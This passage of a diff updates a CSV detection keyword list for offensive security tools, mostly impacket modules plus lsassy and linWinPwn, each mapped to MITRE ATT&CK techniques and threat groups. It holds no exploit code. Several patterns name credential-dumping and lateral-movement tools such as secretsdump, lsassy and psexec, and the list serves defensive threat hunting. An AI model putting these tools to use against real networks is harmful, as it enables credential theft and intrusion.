Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*impacket-GetADUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-GetNPUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-getST*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-getTGT*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketldap_shell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketlogger*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-lookupsid*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketmssqlshell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-netview*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketntlmrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketos_ident*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-psexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketremcomsvc*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketrpcdatabase*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-rpcdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-samrdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacketsecretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" -"*impacket-secretsdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket/*.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket:latest*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket__init__*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket_findDelegation*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket_rpcdump_output_*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*impacket-atexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-dcomexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketfile.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*impacket-GetADUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-GetNPUsers*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getST*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-getTGT*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketldap_shell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketlogger*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-lookupsid*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketmssqlshell*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-netview*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketntlmrelayx*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketos_ident*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-psexec*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-reg*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","POST Exploitation tools","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketremcomsvc*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacketrpcdatabase*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-rpcdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*impacket-samrdump*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - 